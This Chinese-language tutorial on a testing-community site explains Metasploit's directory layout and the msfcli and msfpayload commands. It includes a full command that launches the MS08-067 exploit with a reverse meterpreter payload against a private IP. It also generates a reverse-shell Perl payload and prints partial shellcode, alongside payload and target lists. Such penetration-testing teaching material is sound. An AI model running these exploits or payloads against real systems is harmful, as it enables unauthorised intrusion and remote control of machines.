metasploit的模块构成及功能分析

发表于:2018-11-28 12:00

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:Xysoul    来源:CSDN

  市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。
   exploit@ubuntu:/pentest/framework3$ ls
  CONTRIBUTING.md README.md data metasploit-framework-db.gemspec msfconsole msfrop putty.exe
  COPYING Rakefile db metasploit-framework-full.gemspec msfd msfrpc script
  Gemfile a.exe documentation metasploit-framework-pcap.gemspec msfelfscan msfrpcd scripts
  Gemfile.local.example app external metasploit-framework.gemspec msfencode msfupdate spec
  Gemfile.lock av.exe features modules msfmachscan msfvenom test
  HACKING back.pl lib msfbinscan msfpayload payload.exe tools
  LICENSE config log msfcli msfpescan plugins
  通过以上我们可以看到metasploit的基本为文件结构
  config --metasploit的环境配置信息,数据库配置信息
  data--后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
  db--rails编译生成msf的web框架时的数据库信息
  documentation--用户说明文档及开发文档
  external--metasploit的一些基础扩展模块
  libs--metasploit的一些基础类和第三方模块类
  log--msf运行时的一些系统信息和其他信息
  modules--metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
  msfbinscan--对bin文件进行文件偏移地址扫描
  msfcli--metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
  msfconsole--metasploit的基本命令行,集成了各种功能。
  msfd--metasploit服务,非持久性服务
  msfelfscan--对linux的elf文件偏移地址进行扫描
  msfencode--metasploit的编码模块,可以对mepayload和shellcode进行编码输出
  msfpayload--metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的shellocode,新版本的metasploit即将在2015年6月18日弃用,用msfvenmon替代。
  msfmachscan--功能同msfelfscan
  msfpescan--对windows的pe格式文件偏移地址进行扫描
  msfrop--对windows的pe进行文件地址偏移操作,可以绕过alsr等
  msfrpc--metasploit的服务端,非持久性的rpc服务
  msfrpcd--持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
  msfupdate--metasploit更新模块,可以用来更新metasploit模块
  msfvenom--集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencode
  plugins--metasploit的第三方插件接口
  scripts--metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
  test--metasploit的基本测试目录
  tools--额外的小工具和第三方脚本工具
  下面我们对这些常用命令的用法做一些解释
  msfcli 虽然和msfconsole一样同为命令行界面,但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。
   exploit@ubuntu:/pentest/framework3$ msfcli -h
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  Usage: /usr/local/bin/msfcli [mode]
  =================================================================
  Mode Description
  —- ———–
  (A)dvanced Show available advanced options for this module #显示该模块的高级选项
  (AC)tions Show available actions for this module #显示该模块的详细设置操作选项
  (C)heck Run the check routine of the selected module #运行选择的模块进行检测
  (E)xecute Execute the selected module #执行选择的模块
  (H)elp You’re looking at it baby! #显示msfcli的帮助信息
  (I)DS Evasion Show available ids evasion options for this module #显示该模块的ids
  (M)issing Show empty required options for this module #查看必须的操作选项有哪些没有设置
  (O)ptions Show available options for this module #查看可用的选项
  (P)ayloads Show available payloads for this module #查看模块可用的payload模块
  (S)ummary Show information about this module #显示该模块的详细信息
  (T)argets Show available targets for this exploit module #显示该溢出模块针对的目标类型
  Examples:
   msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
  msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
  这里我们就msfcli的一些具体的参数来解释:
  最常见的用法就是利用metasploit的辅助模块和攻击模块对目标进行操作
  这里我们针对http_version的模块选项进行显示,查看有哪些操作选项。
   exploit@ubuntu:/pentest/framework3$ msfcli auxiliary/scanner/http/http_version rhost=106.186.118.91 O
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules…
  Name Current Setting Required Description
  —- ————— ——– ———–
  Proxies no Use a proxy chain
  RHOSTS yes The target address range or CIDR identifier
  RPORT 80 yes The target port
  THREADS 1 yes The number of concurrent threads
  VHOST no HTTP server virtual host
  exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
  这里会显示针对ms08_067可以使用的payload的信息,我们可以根据我们的系统平台环境和网络环境进行选择。
  exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
  显示08067的操作高级属性,这样在有针对性的针对某些版本溢出时,可以达到更好的效果
   exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  Compatible payloads
  ===================
  Name Description
  ---- -----------
  generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
  PAYLOADSTR.
  generic/debug_trap Generate a debug trap in the target process
  generic/shell_bind_tcp Listen for a connection and spawn a command shell
  generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
  generic/tight_loop Generate a tight loop in the target process
  windows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from
  the IP defined in KHOST. This IP will work as an authentication method
  (you can spoof it with tools like hping). After that you could get your
  shellcode from any IP. The socket will appear as "closed" helping us to
  hide the shellcode
  windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host
  windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for a connection over IPv6
  windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
  windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection
  windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
  windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP hop point. Note that you must first upload
  exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
  M参数显示正在使用的模块有哪些必须的参数没有设置,操作我们可以发现,需要设置远程的服务器ip
   exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  RHOST yes The target address
  msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
  E 参数,是执行当前的选择的模块,如下图,我们选择http服务版本探测,设置好参数,加上E参数,执行当前模块
  msfcli的另外一个参数是t,这里是选择我们针对的远程目标的版本的选择,如下图,我们可以选择合适的目标来进行远程溢出
   exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi t
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  Id Name
  -- ----
  0 Automatic Targeting
  1 Windows 2000 Universal
  2 Windows XP SP0/SP1 Universal
  3 Windows 2003 SP0 Universal
  4 Windows XP SP2 English (AlwaysOn NX)
  5 Windows XP SP2 English (NX)
  6 Windows XP SP3 English (AlwaysOn NX)
  7 Windows XP SP3 English (NX)
  8 Windows XP SP2 Arabic (NX)
  9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10 Windows XP SP2 Chinese - Simplified (NX)
  11 Windows XP SP2 Chinese - Traditional (NX)
  12 Windows XP SP2 Czech (NX)
  13 Windows XP SP2 Danish (NX)
  14 Windows XP SP2 German (NX)
  15 Windows XP SP2 Greek (NX)
  16 Windows XP SP2 Spanish (NX)
  17 Windows XP SP2 Finnish (NX)
  18 Windows XP SP2 French (NX)
  19 Windows XP SP2 Hebrew (NX)
  20 Windows XP SP2 Hungarian (NX)
  21 Windows XP SP2 Italian (NX)
  22 Windows XP SP2 Japanese (NX)
  23 Windows XP SP2 Korean (NX)
  24 Windows XP SP2 Dutch (NX)
  25 Windows XP SP2 Norwegian (NX)
  26 Windows XP SP2 Polish (NX)
  27 Windows XP SP2 Portuguese - Brazilian (NX)
  28 Windows XP SP2 Portuguese (NX)
  29 Windows XP SP2 Russian (NX)
  30 Windows XP SP2 Swedish (NX)
  31 Windows XP SP2 Turkish (NX)
  32 Windows XP SP3 Arabic (NX)
  33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34 Windows XP SP3 Chinese - Simplified (NX)
  35 Windows XP SP3 Chinese - Traditional (NX)
  36 Windows XP SP3 Czech (NX)
  37 Windows XP SP3 Danish (NX)
  38 Windows XP SP3 German (NX)
  39 Windows XP SP3 Greek (NX)
  40 Windows XP SP3 Spanish (NX)
  41 Windows XP SP3 Finnish (NX)
  42 Windows XP SP3 French (NX)
  43 Windows XP SP3 Hebrew (NX)
  44 Windows XP SP3 Hungarian (NX)
  45 Windows XP SP3 Italian (NX)
  46 Windows XP SP3 Japanese (NX)
  47 Windows XP SP3 Korean (NX)
  48 Windows XP SP3 Dutch (NX)
  49 Windows XP SP3 Norwegian (NX)
  50 Windows XP SP3 Polish (NX)
  51 Windows XP SP3 Portuguese - Brazilian (NX)
  52 Windows XP SP3 Portuguese (NX)
  53 Windows XP SP3 Russian (NX)
  54 Windows XP SP3 Swedish (NX)
  55 Windows XP SP3 Turkish (NX)
  56 Windows 2003 SP1 English (NO NX)
  57 Windows 2003 SP1 English (NX)
  58 Windows 2003 SP1 Japanese (NO NX)
  59 Windows 2003 SP1 Spanish (NO NX)
  60 Windows 2003 SP1 Spanish (NX)
  61 Windows 2003 SP2 English (NO NX)
  62 Windows 2003 SP2 English (NX)
  63 Windows 2003 SP2 German (NO NX)
  64 Windows 2003 SP2 German (NX)
  65 Windows 2003 SP2 Portuguese - Brazilian (NX)
  66 Windows 2003 SP2 Spanish (NO NX)
  67 Windows 2003 SP2 Spanish (NX)
  68 Windows 2003 SP2 Japanese (NO NX)
  根据上面的介绍,我们来对目标ip通过ms08_067_netapi进行远程攻击,参数设置如下
   exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi RHOST=192.168.1.168 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5546 E
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  RHOST => 192.168.1.168
  PAYLOAD => windows/meterpreter/reverse_tcp
  LHOST => 192.168.1.10
  LPORT => 5546
  [-] Handler failed to bind to 192.168.1.10:5546
  [*] Started reverse handler on 0.0.0.0:5546
  下面我们介绍我们会经常用到的一个参数,msfpayload,执行msfpayload -h,帮助文件显示的似乎很简单,我们对每个参数的功能做详细的介绍:
   exploit@ubuntu:/pentest/framework3$ msfpayload -h
  [!] ************************************************************************
  [!] * The utility msfpayload is deprecated! *
  [!] * It will be removed on or about 2015-06-08 *
  [!] * Please use msfvenom instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
  [!] ************************************************************************
  Usage: /usr/local/bin/msfpayload [] [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
  OPTIONS:
  -h Help banner
  -l List available payloads
  msfpayload 操作选项 payload模块 变量定义 生成的文件格式,目前支持的格式有:C代码,C#代码,perl代码,ruby代码,Raw文件流,Js代码,exe文件,dll文件,vba文件,War文件,apk文件,python文件,
  如,我们想生成一个通过反弹tcp端口的perl文件格式的payload,那么我们执行以下操作
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5546 P >back.pl[!] ************************************************************************
  [!] * The utility msfpayload is deprecated! *
  [!] * It will be removed on or about 2015-06-08 *
  [!] * Please use msfvenom instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
  [!] ************************************************************************
  ok接下来我们查看该文件是否生成,文件内容是什么
   exploit@ubuntu:/pentest/framework3$ head -n 20 back.pl
  # windows/meterpreter/reverse_tcp - 281 bytes (stage 1)
  # http://www.metasploit.com
  # VERBOSE=false, LHOST=192.168.1.106, LPORT=5546,
  # ReverseConnectRetries=5, ReverseListenerBindPort=0,
  # ReverseAllowProxy=false, ReverseListenerThreaded=false,
  # EnableStageEncoding=false, StageEncoderSaveRegisters=,
  # StageEncodingFallback=true, PrependMigrate=false,
  # EXITFUNC=process, AutoLoadStdapi=true,
  # InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
  # EnableUnicodeEncoding=true
  my $buf =
  "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .
  "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
  "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" .
  "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" .
  "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" .
  "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" .
  "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" .
  "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" .
  "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" .
  这里我们可以看到在当前目录生成了back.pl,查看perl文件内容,可以看到,反弹的ip地址是192.168.1.106,反弹的端口是5546,重试的次数是5次,允许加密,下面是执行反弹的shellcode代码
  这里我们只是举了一个简单的例子,同样,如果我不知道有哪些payload可以提供给我们使用,那么我们只需要执行
   exploit@ubuntu:/pentest/framework3$ msfpayload -l
  [!] ************************************************************************
  [!] * The utility msfpayload is deprecated! *
  [!] * It will be removed on or about 2015-06-08 *
  [!] * Please use msfvenom instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
  [!] ************************************************************************
  Framework Payloads (356 total)
  ==============================
  Name Description
  ---- -----------
  aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
  aix/ppc/shell_find_port Spawn a shell on an established connection
  aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
  aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
  android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
  android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
  android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
  android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
  android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
  …………

         上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
  
21/212>
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号